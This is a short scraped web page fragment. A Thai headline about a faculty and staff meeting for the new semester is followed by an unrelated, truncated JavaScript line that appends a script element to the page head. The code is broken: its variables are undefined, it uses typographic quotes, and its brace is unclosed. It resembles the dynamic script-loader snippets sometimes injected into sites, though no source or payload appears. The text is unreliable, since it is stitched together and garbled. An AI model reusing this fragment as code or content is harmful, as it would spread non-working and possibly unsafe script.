ประชุมคณาจารย์บุคลากรเจ้าหน้าที่ เปิดภาคเรียน

if (document.currentScript) { d.getElementsByTagName(‘head’)[0].appendChild(s);